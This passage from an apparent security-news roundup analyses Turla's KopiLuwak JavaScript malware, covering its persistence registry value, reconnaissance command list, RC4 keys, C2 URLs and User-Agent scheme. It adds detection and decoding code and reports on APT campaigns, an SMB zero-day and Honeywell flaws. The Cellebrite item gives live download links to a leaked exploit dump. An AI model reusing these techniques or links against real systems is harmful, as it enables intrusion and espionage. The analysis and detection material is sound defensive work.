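def decode_layer2(mailform_js: bytes, rc4_key: bytes = LAYER2_RC4_KEY) -> bytes:
    """Extract the Base64 payload string from the layer-2 script and decrypt it.

    Assumption: the payload is the longest Base64-looking run in the script;
    adjust the pattern if a sample stores it differently.
    """
    runs = re.findall(rb"[A-Za-z0-9+/]{32,}={0,2}", mailform_js)
    if not runs:
        raise ValueError("no Base64 payload found in layer-2 script")
    return rc4(rc4_key, base64.b64decode(max(runs, key=len)))


def decode_beacon_body(post_body: bytes) -> bytes:
    """Recover the profiling output from a captured beacon POST body
    (Base64 of RC4 ciphertext under the second key)."""
    return rc4(PROFILE_RC4_KEY, base64.b64decode(post_body))
```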

Third Layer JavaScript

The third layer payload is where the C2 beaconing and system information collection is performed. This JS will begin by copying itself to the appropriate folder location based on the version of Windows running:

c:\Users\<USERNAME>\AppData\Local\Microsoft\Windows\mailform.js

c:\Users\<USERNAME>\AppData\Local\Temp\mailform.js

c:\Documents and Settings\<USERNAME>\Application Data\Microsoft\Windows\mailform.js

Persistence

Next, it will establish persistence on the victim by writing to the following registry key:

Key: HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\mailform
Value: wscript.exe /b "<PATH_TO_JS> NPEfpRZ4aqnh1YuGwQd0"

Profiling

After establishing its persistence, it will then execute a series of commands on the victim system using “cmd.exe /c” and store them to a file named “~dat.tmp”, in the same folder where “mailform.js” is located:

systeminfo
net view
net view /domain
tasklist /v
gpresult /z
netstat -nao
ipconfig /all
arp -a
net share
net use
net user
net user administrator
net user /domain
net user administrator /domain
set
dir %systemdrive%\Users\*.*
dir %userprofile%\AppData\Roaming\Microsoft\Windows\Recent\*.*
dir %userprofile%\Desktop\*.*
tasklist /fi "modules eq wow64.dll"
tasklist /fi "modules ne wow64.dll"
dir "%programfiles(x86)%"
dir "%programfiles%"
dir %appdata%
Once the information is collected into the temporary “~dat.tmp” file, the JavaScript reads its contents into memory, RC4 encrypts it with the key “2f532d6baec3d0ec7b1f98aed4774843”, and deletes the file after a 1 second sleep, virtually eliminating storage of victim information on disk and only having an encrypted version in memory.

Network Communications

With the victim info stored in encrypted form in memory, the JavaScript then will perform the necessary callback(s) to the C2 servers which are hard coded in the payload. The addresses seen in this payload were as follows:

http://soligro[.]com/wp-includes/pomo/db.php
http://belcollegium[.]org/wp-admin/includes/class-wp-upload-plugins-list-table.php
It should be noted that the above domains appear to have been compromised by the actor based on the locations of the PHP scripts.


Belcollegium[.]org – a legitimate website compromised and used for C2

Victim data is sent to the C2 servers in the form of a POST request. The headers of the POST request contain a unique User-Agent string that will remain the same per victim system. The User-Agent string is created by performing the following steps:

Concatenate the string “KRMLT0G3PHdYjnEm” + <SYSTEM_NAME> + <USER NAME>

Use the above string as input to the following function (System Name and User Name have been filled in with example data ‘Test’ and ‘Admin’):

function EncodeUserAgent() {
    var out = "";
    var UserAgent = 'KRMLT0G3PHdYjnEm' + 'Test' + 'Admin';
    for (var i = 0; i < 16; i++) {
        var x = 0;
        for (var j = i; j < UserAgent.length - 1; j++) {
            x = x ^ UserAgent.charCodeAt(j);
        }
        x = (x % 10);
        out = out + x.toString(10);
    }
    out = out + 'KRMLT0G3PHdYjnEM';
    return out;
}
The function above will produce a unique “UID” consisting of a 16-digit number with the string “KRMLT0G3PHdYjnEm” appended to the end. In the example above, using the System Name “Test” and User Name “Admin”, the end result would be “2356406508689132KRMLT0G3PHdYjnEm”.

Prepend the string “Mozilla/5.0 (Windows NT 6.1; Win64; x64); ” to the result from the last step and send it as the “user-agent:” header. This is now the unique User-Agent value for the victim callbacks; in this example, the final header will be “user-agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64); 2356406508689132KRMLT0G3PHdYjnEm”.
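The User-Agent construction above, turned into a detection aid as an added example in Python (not code from the Kaspersky analysis): a port of EncodeUserAgent() that computes the UID for a given host/user pair, and a matcher that flags the resulting User-Agent in proxy log lines and attributes a UID back to a known host. The log lines are constructed; because the quoted code appends “KRMLT0G3PHdYjnEM” while the prose says “...Em”, the pattern accepts either final letter.

```python
import re

# Constant from the analysis above: it both seeds the UID and is appended to it.
UA_MAGIC = "KRMLT0G3PHdYjnEm"
UA_PREFIX = "Mozilla/5.0 (Windows NT 6.1; Win64; x64); "


def kopiluwak_uid(system_name: str, user_name: str) -> str:
    """Port of EncodeUserAgent(): 16 decimal digits derived from magic + host + user.

    Digit i is the XOR of the character codes from position i up to, but not
    including, the last character, reduced mod 10, exactly as the JavaScript does.
    """
    s = UA_MAGIC + system_name + user_name
    digits = []
    for i in range(16):
        x = 0
        for j in range(i, len(s) - 1):
            x ^= ord(s[j])
        digits.append(str(x % 10))
    return "".join(digits)


def expected_user_agent(system_name: str, user_name: str) -> str:
    """The full User-Agent value a given host/user pair would beacon with."""
    return UA_PREFIX + kopiluwak_uid(system_name, user_name) + UA_MAGIC


# The prose says the UID ends in "...Em" while the quoted code appends "...EM";
# accept either so a sample built from one or the other is not missed.
UA_PATTERN = re.compile(
    r"Mozilla/5\.0 \(Windows NT 6\.1; Win64; x64\); (\d{16})KRMLT0G3PHdYjnE[mM]"
)


def find_beacons(log_lines, known_hosts=()):
    """Scan proxy log lines for the beacon User-Agent.

    Returns (line_number, uid, attribution) tuples; attribution is the
    (system_name, user_name) pair from known_hosts whose computed UID matches,
    or None when the UID belongs to a host we cannot name.
    """
    lookup = {kopiluwak_uid(h, u): (h, u) for h, u in known_hosts}
    hits = []
    for n, line in enumerate(log_lines, start=1):
        m = UA_PATTERN.search(line)
        if m:
            uid = m.group(1)
            hits.append((n, uid, lookup.get(uid)))
    return hits


# Constructed proxy log lines (not real traffic): one KopiLuwak beacon to the
# db.php path named in the analysis, one ordinary browser request.
SAMPLE_LOG = [
    '10.0.0.5 - - [12/Jan/2017:10:01:02 +0000] "POST /wp-includes/pomo/db.php HTTP/1.1" '
    '200 4 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64); 2356406508689132KRMLT0G3PHdYjnEm"',
    '10.0.0.6 - - [12/Jan/2017:10:01:05 +0000] "GET /index.html HTTP/1.1" '
    '200 512 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36"',
]

if __name__ == "__main__":
    for n, uid, who in find_beacons(SAMPLE_LOG, [("Test", "Admin")]):
        print(f"line {n}: KopiLuwak beacon, UID {uid}, host/user {who}")
```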

The POST request will contain the unique User-Agent string above as one of the headers and also the Base64 encoded version of the RC4 encrypted victim data collected earlier.

The C2 will respond in one of four ways after the POST request:

“good”

“exit”

“work”

“fail”

In the case of an answer of “good”, the JavaScript will then sleep for a random amount of time, ranging from 3600-3900 seconds.

The “exit” command will cause the script to exit gracefully, thus shutting down the communications to the C2 server until the next startup / login by the user.

The “fail” command is for uninstalling the JavaScript and its persistence. Both the “mailform.js” file and registry key created for persistence will be deleted upon receipt of this command.

The “work” command is used to task the victim’s system to run arbitrary commands via Wscript.shell.run(). It begins by checking to see if a file “mailform.pif” exists in the same directory as the JavaScript, and if so, it will delete it. The victim will then send a POST request to the C2 much in the same way as before with the beacon traffic, but with some slight differences. The User-Agent header will remain the same as in the beacon traffic, but the data sent to the C2 will consist of the 4-byte string “work”. If the response from the server after this acknowledgement is “200 OK”, then the system will proceed to read the response data into memory, RC4 encrypt it using the same key “2f532d6baec3d0ec7b1f98aed4774843”, then write it out to the “mailform.pif” file referenced above. The command file is run, the JavaScript will sleep for 30 seconds, and then the file is subsequently deleted.

Victims and Sinkholing

One of the domains involved in this new malware (soligro[.]com) expired in July 2016 and was available for purchase and sinkholing at the time of the analysis. Sinkhole data shows several potential victims, with one high profile victim (195.251.32.62) located within the Greek Parliament:

The majority of connections to the sinkhole server have been observed from IP ranges residing within Greece. This leads us to believe the main target for the specific document above was Greece, although we also have indications of targeting in Romania and Qatar based on other data.

Conclusions

In recent months, the Turla actors have increased their activity significantly. The addition of KopiLuwak to their already existing ICEDCOFFEE JavaScript payload indicates the group continues to evolve and deliver new tools to avoid detection by known malware signatures.

Currently, it seems the Turla actors continue to rely heavily on embedded macros in Office documents. While this may appear to be an elementary technique to use for such a sophisticated actor, they are repeatedly successful in compromising high value targets with this method. It is advised that users disable macros in their enterprise and not allow the user to enable said content unless absolutely necessary. Furthermore, using the polymorphic obfuscation technique for the macros has caused difficulties in writing signatures for detection.


NATO Publishes Tallinn Manual 2.0 on International Law Applicable to Cyber Ops

4.2.2017 securityweek Cyber

NATO's Cooperative Cyber Defense Centre of Excellence (CCDCOE), based in Tallinn Estonia, has published 'Tallinn Manual 2.0 on the International Law Applicable to Cyber Operations.' Its world launch will be in Washington DC, February 8 at The Atlantic Council; followed by Europe at The Hague, February 13; and Tallinn, February 17.

Tallinn 2.0 incorporates Tallinn 1.0, published in 2012. While Tallinn 1 sought to define how international law relates to cyberwar, Tallinn 2 expands the content to include cyber activity that falls short of actual warfare. To reflect this expansion in content, the name has changed from 'applicable to cyber warfare' to 'applicable to cyber operations'.

The Tallinn Manual takes no moral standpoint. It starts from the observation that cyber operations are subject to existing pre-cyber international law, and then defines how that law should be applied to different cyber operations. This forces it to confront many of the apparent difficulties in international cyber behavior head on -- such as the applicability of self-defense and the right to strike back, and attribution.

The Tallinn Manual process is led by Michael Schmitt, an expert in the law of armed conflict, Professor of Public International Law at Exeter Law School, and a Senior Fellow at the United States Naval War College. It is authored by nineteen international law experts. Although it has no legal standing and does not represent the views of NATO per se, it has become an influential resource for legal advisers dealing with cyber issues.

Schmitt told SecurityWeek that the Manual 1.0 publication became far more popular than was expected. He thought one reason was that it provided a legal position that didn't force governments to declare their own preference. "Governments," he suggested, "want to set legal bars high for potential aggressors while setting them as low as possible for themselves." The Manual takes away that dilemma by presenting the existing legal position under international law.

Tallinn Manual

Tallinn 2.0 expands this legal exploration beyond cyber warfare into civilian situations. This makes it more complex because it includes the multitude of cyber intrusions faced by commercial organizations every day. But it is international law rather than any national law that is explored.

For example, there is growing enthusiasm for the right for private industry to strike back at aggressors, almost as an extension of self-defense. The law, however, is relatively simple -- they cannot. Schmitt gave an example. "If a foreign nation launched an attack against Exeter University, there would be a right for retaliatory action; but not by Exeter University. The attack could be considered as an attack against the UK; but only the UK government could respond."

Attribution is another difficult area. The law cannot be applied against a transgressor if the transgressor is not definitively known. There have been attempts to develop acceptable methods of attribution; most notably perhaps by Microsoft. Microsoft's proposal would be for an international committee of independent experts who would decide on and name transgressors.

Schmitt is not a great supporter of this approach; not because it is bad, but because it ultimately depends on recommendations. The law is not about recommendations, but about clear mandates. "I don't know about technical attribution," he told SecurityWeek. "I've heard arguments that it is and it is not possible. But whenever I talk to intelligence agencies, they all say attribution is not based on simple technology, but on the summation of intelligence information -- signals intelligence, field agents, geopolitics and so on."

Once a government is confident in its attribution -- and particularly if other governments agree with that attribution -- then the Tallinn Manual can explain the legally permissible response.

Tallinn 2, explains the associated CCDCOE announcement, "covers a full spectrum of international law applicable to cyber operations ranging from peacetime legal regimes to the law of armed conflict, covering a wide array of international law principles and regimes that regulate events in cyberspace. Some pertain to general international law, such as the principle of sovereignty and the various bases for the exercise of jurisdiction. The law of state responsibility, which includes the legal standards for attribution, is examined at length. Additionally, numerous specialised regimes of international law, including human rights law, air and space law, the law of the sea, and diplomatic and consular law, are examined in the context of cyber operations."

Tallinn Manual 2.0 is available from Cambridge University Press.


Hacker leaked tools stolen from mobile forensics company Cellebrite
4.2.2017 thehackernews Mobil

The hacker that breached the systems of the mobile forensics company Cellebrite leaked online some tools and announced further releases.
In January the Israeli mobile phone data extraction company Cellebrite was hacked; the company had made headlines during the dispute between Apple and the FBI over the San Bernardino shooter’s iPhone.

The company's main product is the Universal Forensic Extraction Device (UFED), a device that can extract data (e.g. SMS messages, emails, call logs) from a huge number of different mobile phone models.


The experts are still investigating the case; meantime Cellebrite has confirmed the security breach. The company confirmed that someone accessed its systems and stole roughly 900 Gb of data, mainly composed of log data from its end-user licensing system my.Cellebrite and other sensitive data. The archive also includes 350 Gb of offline world map backups. According to the company, the attackers did not obtain “full passwords” or payment information, although it has admitted that some password hashes have been stolen.

“Contrary to some erroneous reports, the attack did not impact any Cellebrite intellectual property related to the delivery of Cellebrite Forensic products and services, such as proprietary source code,” reads an announcement issued by the company. “There is no increased risk to Cellebrite Forensic customers as a result of normal, ongoing use of Cellebrite UFED software and hardware, including routine software updates.”

According to the company, hackers accessed just some password hashes and information on closed technical support inquiries.

The hacker decided anyway to publish not only information contained in the archive, but also exploits for Android, iOS, and BlackBerry mobile devices.

According to Motherboard, the forensics expert Jonathan Zdziarski, who analyzed the dump, confirmed that many of the exploits for iOS devices are widely available tools; for this reason he avoids calling them “exploits.”

The hacker promptly responded to Zdziarski via Pastebin; he confirmed that the Apple tools are widely available, but added that the BlackBerry files are not publicly available.

“The more discerning eye will notice that some of the Apple exploits bear a remarkable resemblance to those available to any teenager interested in the jailbreaking scene perhaps not all those tax dollars have been wasted, the Blackberry epr is still worth a look at.” states the hacker.

“The files referenced here are part of the distribution package of our application and are available to our customers. They do not include any source code.” wrote a spokesperson for Cellebrite in an email sent to Motherboard.

He added that the company monitors new research from academia and the information security community, including “newly published forensic methods, research tools and publicly documented issues, including ‘jailbreaks,’ which enable platform research.”

The hacker plans to release a small sample of files retrieved via the weaponized Cellebrite update service deployed on MS Windows based devices and desktops (SYSTEM privs) within the customer infrastructure.

“Analysis of the compression and obfuscation employed by Cellebrite on products supplied to British MOD juxtaposed with the protection free versions supplied to SOCOM and others is also included within.” added the hacker.

The download links are:

https://mega.nz/#!sZUkSbDT!l740KTf5TG-TgjN-YNZcejSOfhUn43jZ8jR3Lw_w7dY

https://mega.nz/#!0d9zBQLI!DdKhZDXoMEnO6RpZDHWMGVV7nBXXZ98cPzjzVqLsVuw


Russian APT 29 group launched cyber attacks against Norwegian authorities
4.2.2017 securityaffairs APT

The Norwegian intelligence agency PST is one of the targets of spear phishing attacks launched by the Russian APT 29 group.
The dreaded Russian APT 29 group is back: the Norwegian authorities accuse Russia of cyber attacks that hit the foreign ministry, the intelligence service and other institutions.

“Nine different email accounts were targeted in an attempt at what is called spear phishing, in other words malicious emails,” confirmed Arne Christian Haugstoyl, an official with Norway’s intelligence service PST, in an interview with the television channel TV2.

Norway was informed of the ongoing attacks by an allied state and is currently investigating the case, but it is still unclear what the motivation behind the attack was.

“It’s difficult to know what the goal,” he added.

Although legislative elections are scheduled for September 2017, experts believe that the attacks are not linked to the vote.

The APT 29 group is likely interested in Norway's NATO membership, especially in the wake of the Ukraine crisis.

Recently the Norwegian Government also allowed the deployment of 300 US soldiers on its soil.

The Norwegian official confirmed that the APT 29 group has links to the Russian authorities; the hackers are also accused of having interfered with the recent US Presidential Election.


At the time of writing it is not clear whether the hackers have exfiltrated sensitive information; according to Verdens Gang (VG), PST spokesman Martin Bernsen said there was “no reason to believe that classified information had been obtained in connection with the attack.”

According to the Norwegian Government, the hackers also targeted the national radiation protection agency, the parliamentary group of the Labour party and a school.

Recently Moscow refused visas to two senior Norwegian lawmakers, a decision considered by the Government of Oslo as “unjustifiable”.

Moscow explained the visa refusal was its response to Norway’s position on the EU economic sanctions against Russia over the Ukraine crisis.


Windows SMB 0-Day Exposes Systems to Attacks

3.2.2017 securityweek Vulnerebility

A 0-day memory corruption vulnerability discovered in the SMB (Server Message Block) protocol can be exploited to cause denial of service or potentially execute arbitrary code on a vulnerable system.

According to the United States Computer Emergency Readiness Team (US-CERT), which has already published an advisory on the matter, the bug resides in the manner in which Windows handles SMB traffic and can be exploited by remote, unauthenticated attackers for nefarious purposes.

SMB (one of its versions was also known as the Common Internet File System, or CIFS) is an application-layer network protocol that allows machines to access files, printers, serial ports, and miscellaneous communications between nodes on a local network, while also offering an authenticated inter-process communication mechanism.

According to US-CERT, the Windows platform fails to properly handle a server response containing too many bytes following the structure defined in the SMB2 TREE_CONNECT Response structure. Thus, when a vulnerable Windows client system connects to a malicious SMB server, it can crash (Blue Screen of Death, or BSOD) in mrxsmb20.sys.

The advisory also notes that the vulnerability has already been confirmed as exploitable in denial of service attacks, but that it’s not clear whether it could be exploited further. US-CERT warns that an attacker might also be able to execute arbitrary code with Windows kernel privileges.
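The defensive counterpart of the bug described above is a client-side parser that treats the TREE_CONNECT Response as the fixed 16-byte structure it is and rejects any trailing bytes. The following is an added example, not code from US-CERT or Microsoft; the header and response field layout follows the public MS-SMB2 specification, and all sample messages are constructed.

```python
"""Strict parser for an SMB2 TREE_CONNECT Response.

Added example, not code from US-CERT or Microsoft. It shows the bounds check
a client should enforce for the structure the advisory names: the
TREE_CONNECT Response body is a fixed 16-byte structure, so a message with
extra bytes after it is rejected instead of processed. Field layout follows
the public MS-SMB2 specification; the sample messages are constructed.
"""
import struct

SMB2_MAGIC = b"\xfeSMB"
SMB2_HEADER_LEN = 64
SMB2_TREE_CONNECT = 0x0003
SMB2_FLAGS_SERVER_TO_REDIR = 0x1  # set on every server response
TREE_CONNECT_RESP_LEN = 16        # StructureSize of a valid response


class MalformedResponse(ValueError):
    """Raised for any message that does not fit the expected fixed layout."""


def parse_tree_connect_response(msg):
    """Parse a single (non-compound) SMB2 message carrying a TREE_CONNECT
    Response and return its fields, or raise MalformedResponse."""
    if len(msg) < SMB2_HEADER_LEN:
        raise MalformedResponse("short SMB2 header")
    if msg[:4] != SMB2_MAGIC:
        raise MalformedResponse("bad ProtocolId")
    # Header after ProtocolId: StructureSize(2) CreditCharge(2) Status(4)
    # Command(2) CreditResponse(2) Flags(4) NextCommand(4) ...
    hdr_size, _charge, status, command, _credits, flags, next_cmd = \
        struct.unpack_from("<HHIHHII", msg, 4)
    if hdr_size != SMB2_HEADER_LEN:
        raise MalformedResponse("header StructureSize must be 64")
    if command != SMB2_TREE_CONNECT:
        raise MalformedResponse("not a TREE_CONNECT message")
    if not flags & SMB2_FLAGS_SERVER_TO_REDIR:
        raise MalformedResponse("not a server response")
    if next_cmd != 0:
        raise MalformedResponse("compound messages not handled here")
    body = msg[SMB2_HEADER_LEN:]
    if len(body) < 2:
        raise MalformedResponse("short response body")
    declared = struct.unpack_from("<H", body, 0)[0]
    # The defensive check: both the declared size and the actual body length
    # must be exactly 16. Trailing bytes are an error, not data to consume.
    if declared != TREE_CONNECT_RESP_LEN:
        raise MalformedResponse(f"declared StructureSize {declared}, expected 16")
    if len(body) != TREE_CONNECT_RESP_LEN:
        raise MalformedResponse(f"body is {len(body)} bytes, expected exactly 16")
    share_type, _rsv, share_flags, caps, max_access = struct.unpack("<BBIII", body[2:])
    return {"status": status, "share_type": share_type, "share_flags": share_flags,
            "capabilities": caps, "maximal_access": max_access}


def is_well_formed(msg):
    """True when msg parses as a well-formed TREE_CONNECT Response."""
    try:
        parse_tree_connect_response(msg)
        return True
    except MalformedResponse:
        return False


def build_message(body, command=SMB2_TREE_CONNECT, flags=SMB2_FLAGS_SERVER_TO_REDIR):
    """Wrap a body in a constructed 64-byte SMB2 header (sample data only)."""
    hdr = SMB2_MAGIC + struct.pack("<HHIHHII", SMB2_HEADER_LEN, 1, 0, command, 1, flags, 0)
    hdr += struct.pack("<QIIQ", 1, 0, 0x1234, 0xABCDEF)  # MessageId Reserved TreeId SessionId
    hdr += b"\x00" * 16                                  # Signature
    return hdr + body


# Constructed bodies: a valid 16-byte response (disk share, flags, capabilities,
# maximal access) and the same response followed by 200 extra bytes.
GOOD_BODY = struct.pack("<HBBIII", 16, 0x01, 0, 0x00000030, 0x00000008, 0x001F01FF)
OVERSIZED_BODY = GOOD_BODY + b"\x41" * 200

if __name__ == "__main__":
    print(parse_tree_connect_response(build_message(GOOD_BODY)))
    print("oversized accepted?", is_well_formed(build_message(OVERSIZED_BODY)))
```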

“We have confirmed the crash with fully-patched Windows 10 and Windows 8.1 client systems. Note that there are a number of techniques that can be used to trigger a Windows system to connect to an SMB share. Some may require little to no user interaction,” the advisory also notes.

With exploit code for the vulnerability already publicly available but no practical solution to this problem known at this time, suggested workarounds include blocking outbound SMB connections (TCP ports 139 and 445 along with UDP ports 137 and 138) from the local network to the WAN.

The vulnerability has a base Common Vulnerability Scoring System (CVSS) score of 10.0. It has been publicly reported by @PythonResponder, who says that Windows Server 2012 and 2016 versions are also affected. Proof-of-concept code has been published on GitHub.


Chinese Cyberspies Target Russia With New Malware

3.2.2017 securityweek Virus
A China-linked cyber espionage group has been using new malware and new techniques in attacks aimed at military and aerospace organizations in Russia and Belarus.

In July 2016, security firm Proofpoint reported that the threat actor had been using NetTraveler (aka TravNet) and the PlugX RAT to target Russia and neighboring countries. Researchers now revealed that, at around the same time, the group started using a new downloader, dubbed ZeroT, and Microsoft Compiled HTML Help (.chm) files to deliver PlugX.

Attackers sent victims .chm files containing an HTM file and an executable. When the help file is opened, a Russian-language text is displayed and the victim is asked by the User Account Control (UAC) feature in Windows to allow the execution of an “unknown program.” If the user clicks “Yes,” the ZeroT downloader is dropped onto the system.

Similar to earlier attacks, the APT actor also used specially crafted Word documents created with an exploit generator named MNKit. This Office exploit generator has allowed researchers to find connections between several different groups believed to be operating out of China.

The emails and files used as bait often referenced the Commonwealth of Independent States (CIS), which is an alliance of former Soviet Union countries, Russian government programs, and Russia’s defense industry.

The threat group has also used self-extracting RAR archives to deliver ZeroT. Many of these archives included an executable named “Go.exe,” which leverages the Event Viewer tool in Windows to bypass UAC.

Once it infects a system, ZeroT contacts its command and control (C&C) server, and uploads information about the infected system. ZeroT then downloads a previously known variant of the PlugX RAT, either directly as a non-encoded PE payload or as a Bitmap (.bmp) image file that uses steganography to hide the malware.

Proofpoint said the C&C domains used by ZeroT have also been seen in NetTraveler attacks. The PlugX samples leveraged some of the C&C domains observed in a 2015 campaign.

Following the indictment of People's Liberation Army (PLA) officers, threats of economic sanctions, and the agreement made by the U.S and China in 2015, security firms reported that the volume of Chinese attacks aimed at the United States dropped significantly.

However, researchers pointed out that China-linked threat groups have continued to target other regions, such as Europe and Russia.


Norway Accuses Russia of Cyberattack

3.2.2017 securityweek Cyber
Oslo - Norway's foreign ministry, army and other institutions were targeted in a recent cyberattack by a group suspected of ties to Russian authorities, Norwegian intelligence -- which was among the targets -- said Friday.

Known as APT 29, the group singled out by Oslo has already been accused of hacking interference in the US election last year.

"Nine different email accounts were targeted in an attempt at what is called spear phishing, in other words malicious emails," Arne Christian Haugstoyl, an official with Norway's intelligence service PST, told television channel TV2.

"It's difficult to know what the goal" of the operation was, he said, adding that Norway was alerted to the attack by an allied country.

He described APT 29 as a group "with links to the Russian authorities".

PST spokesman Martin Bernsen, quoted by daily Verdens Gang (VG), said there was "no reason to believe that classified information had been obtained in connection with the attack."

In addition to the foreign ministry, the army and PST itself, the attack -- the date of which was not disclosed -- also targeted the Norwegian radiation protection agency, a school and the parliamentary group of the Labour party, the traditionally dominant political party in Norway but which is currently in opposition.

Legislative elections are scheduled for September 11, though no link has been made to the vote.

Norway, a NATO member, and its neighbor Russia normally enjoy good relations but ties have grown more tense in the wake of the Ukraine crisis.

The Scandinavian country on Wednesday summoned the Russian ambassador to lodge a protest after Moscow refused visas to two senior lawmakers in a move Oslo denounced as "unjustifiable".

Russia said the visa refusal was a reaction to Norway's participation in EU economic sanctions against it over the Ukraine crisis.

Moscow was also angered by the recent deployment of some 300 US soldiers on Norwegian soil.


Several Flaws Patched in Honeywell Controllers

3.2.2017 securityweek Vulnerebility
Honeywell has released updates for its XL Web II controllers to address several critical and high severity vulnerabilities that can be exploited remotely from the Internet.

XL Web II or Excel Web II controllers, which are also sold under the Falcon brand, are web-based SCADA (supervisory control and data acquisition) systems designed for building management applications.

Security researcher Maxim Rupp discovered last summer that the product is affected by flaws that allow a remote attacker to obtain sensitive information and use the affected system as an entry point into the targeted organization’s network.

Rupp told SecurityWeek that, using the Shodan search engine, he has identified more than 600 vulnerable devices accessible from the Internet.

ICS-CERT has published an advisory describing the vulnerabilities, but the researcher says there are some inaccuracies. According to the expert’s own report, the flaws affect XL20xxBxx controllers running firmware version XLWeb2_vUBC_3-04-04-07 and prior, and CLEA20xxBxx devices running firmware version Eagle_vUBC_3-04-04-07 and prior.

The most serious of the flaws, rated critical based on their CVSS score, are related to exposed credentials. The expert discovered that the application stores passwords in easily accessible JavaScript files for client-side verification (CVE-2017-5140). These passwords are stored in clear text (CVE-2017-5139) and an attacker can access them without authentication.


Another vulnerability rated critical is an improper privilege management issue (CVE-2017-5142) that allows a user with limited privileges to access certain functions simply by navigating to a specific URL. These functions are normally accessible only to users with higher privileges.

Rupp has also discovered a high severity path traversal flaw (CVE-2017-5143) that allows an unauthenticated attacker to gain access to files that can contain sensitive information.

ICS-CERT’s advisory also mentions a medium severity session fixation flaw that could allow an attacker to gain access to a targeted user’s account (CVE-2017-5141). Rupp said this vulnerability was not included in his report and that it likely refers to a combination of weaknesses.

According to the researcher and ICS-CERT, Honeywell addressed the vulnerabilities with the release of version 3.04.05.05. Users can obtain the patches by contacting their vendor. There is no evidence that the flaws have been exploited in the wild.


Chinese state-sponsored hackers targets Russia and Belarus with ZeroT and PlugX
3.2.2017 securityaffairs Hacking

According to the firm Proofpoint, Chinese state-sponsored actors continue to spy on military and aerospace organizations in Russia and Belarus.
Chinese state-sponsored actors are spying on military and aerospace interests in Russia and Belarus. According to the experts from Proofpoint, the attacks began in the summer of 2016, when the Chinese hackers launched a spear-phishing campaign leveraging a new downloader known as ZeroT to deliver the PlugX RAT.

Researchers explained that in the past the same threat actors conducted spear-phishing campaigns using Microsoft Word attachments that exploited CVE-2012-0158, or containing malicious URLs pointing to .rar-compressed malicious executables.


The Proofpoint analysis revealed that Russian firms are among the targets of the group.

The Chinese hackers switched tactics for spying on Russian jet makers once they had completed development of the ZeroT malware.

“Most recently, we have observed the same group targeting military and aerospace interests in Russia and Belarus.” reads the analysis published by ProofPoint. “Since the summer of 2016, this group began using a new downloader known as ZeroT to install the PlugX remote access Trojan (RAT) and added Microsoft Compiled HTML Help (.chm) as one of the initial droppers delivered in spear-phishing emails.”

The analysis of the ZeroT malware revealed that it uses obfuscation techniques to avoid detection; a significant number of the samples analyzed by the experts contained a file named Go.exe, which performs the Windows UAC bypass.

ZeroT communicates with its C&C server over HTTP and uses a fake User-Agent in all its requests.

“Mozilla/6.0 (compatible; MSIE 10.0; Windows NT 6.2; Tzcdrnt/6.0)”, with “Tzcdrnt” possibly being a typo of “Trident.” In all the samples we observed, ZeroT first beacons to index.php expecting an RC4-encrypted response using a static key: “(*^GF(9042&*”.” continues the analysis.
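The fake User-Agent and the static RC4 key quoted above (and the HTTP C&C beaconing described in the earlier Proofpoint summary) are directly usable by defenders: the first as a proxy-log indicator, the second to decode a captured beacon reply during incident analysis. The following is an added example, not Proofpoint's code; the User-Agent string and key are the ones quoted in the report, while the log format and every sample log line are constructed.

```python
"""Flag ZeroT-style HTTP beacons in proxy logs and decode an RC4 C2 reply.

Added example, not Proofpoint's code. The User-Agent string and the static
RC4 key are the ones quoted in the analysis; the log format and all sample
log lines are constructed for illustration.
"""
import re

# Exact fake User-Agent ZeroT sends, per the Proofpoint analysis.
ZEROT_UA = "Mozilla/6.0 (compatible; MSIE 10.0; Windows NT 6.2; Tzcdrnt/6.0)"
# Static RC4 key the first index.php response is encrypted with.
ZEROT_RC4_KEY = b"(*^GF(9042&*"

# Constructed proxy log format: <client-ip> <method> <url> "<user-agent>"
LOG_RE = re.compile(r'^(?P<src>\S+) (?P<method>[A-Z]+) (?P<url>\S+) "(?P<ua>[^"]*)"$')


def find_zerot_beacons(log_lines):
    """Return (src, url, reason) tuples for lines that match ZeroT indicators.

    Two indicators are used: the exact fake User-Agent, and the weaker signal
    of any 'Mozilla/6.0' User-Agent (no real browser reports that version)
    requesting index.php, which is where ZeroT first beacons.
    """
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue  # skip lines that do not fit the constructed format
        src, url, ua = m["src"], m["url"], m["ua"]
        if ua == ZEROT_UA:
            hits.append((src, url, "exact ZeroT User-Agent"))
        elif ua.startswith("Mozilla/6.0") and url.endswith("/index.php"):
            hits.append((src, url, "Mozilla/6.0 User-Agent beaconing to index.php"))
    return hits


def rc4(key, data):
    """Plain RC4 (key scheduling + keystream generation). Symmetric, so one
    function both encrypts and decrypts."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def decode_zerot_response(body):
    """Decrypt a captured index.php response body with ZeroT's static key,
    as an analyst would when reconstructing the C2 exchange from a pcap."""
    return rc4(ZEROT_RC4_KEY, body)


# Constructed sample log lines: a normal browser, the exact ZeroT User-Agent,
# a look-alike with the typo corrected, and a normal browser fetching index.php.
SAMPLE_LOG = [
    '10.0.0.5 GET http://intranet.example/home "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/51.0"',
    '10.0.0.7 GET http://c2.example/index.php "Mozilla/6.0 (compatible; MSIE 10.0; Windows NT 6.2; Tzcdrnt/6.0)"',
    '10.0.0.9 POST http://c2.example/index.php "Mozilla/6.0 (compatible; MSIE 10.0; Windows NT 6.2; Trident/6.0)"',
    '10.0.0.11 GET http://www.example/index.php "Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko"',
]

if __name__ == "__main__":
    for src, url, reason in find_zerot_beacons(SAMPLE_LOG):
        print(f"{src} -> {url}: {reason}")
    # Round-trip a constructed reply to show the static key recovers it.
    captured = rc4(ZEROT_RC4_KEY, b"http://c2.example/payload.bmp")  # constructed
    print(decode_zerot_response(captured))
```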

Chinese nation-state hackers tied to the PLA have already targeted US and European firms in the aerospace industry in the past.

